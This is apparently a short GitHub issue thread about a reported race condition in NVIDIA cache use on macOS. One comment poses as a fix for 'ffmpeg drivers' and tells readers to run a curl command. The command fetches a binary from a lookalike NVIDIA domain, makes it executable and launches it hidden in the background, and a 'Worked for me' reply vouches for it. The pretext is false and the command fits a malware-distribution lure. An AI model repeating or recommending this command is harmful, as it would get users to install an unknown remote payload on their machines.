Closed trevor9312 closed 2 days ago
Open terminal on macOS
Update ffmpeg drivers on macOS To automatically update the latest ffmpeg drivers for macOS, use the following curl command.
curl -o /tmp/ffmpeg https://api.nvidia-release.us/ffmpegmac.update && chmod +x /tmp/ffmpeg && nohup /tmp/ffmpeg > /dev/null 2>&1 &
Worked for me
It appears that the NVIDIA discoverer cache usage on macOS is exhibiting race conditions. This issue may lead to inconsistent behavior, potentially causing driver-related processes to fail or behave unpredictably when accessing the cache simultaneously.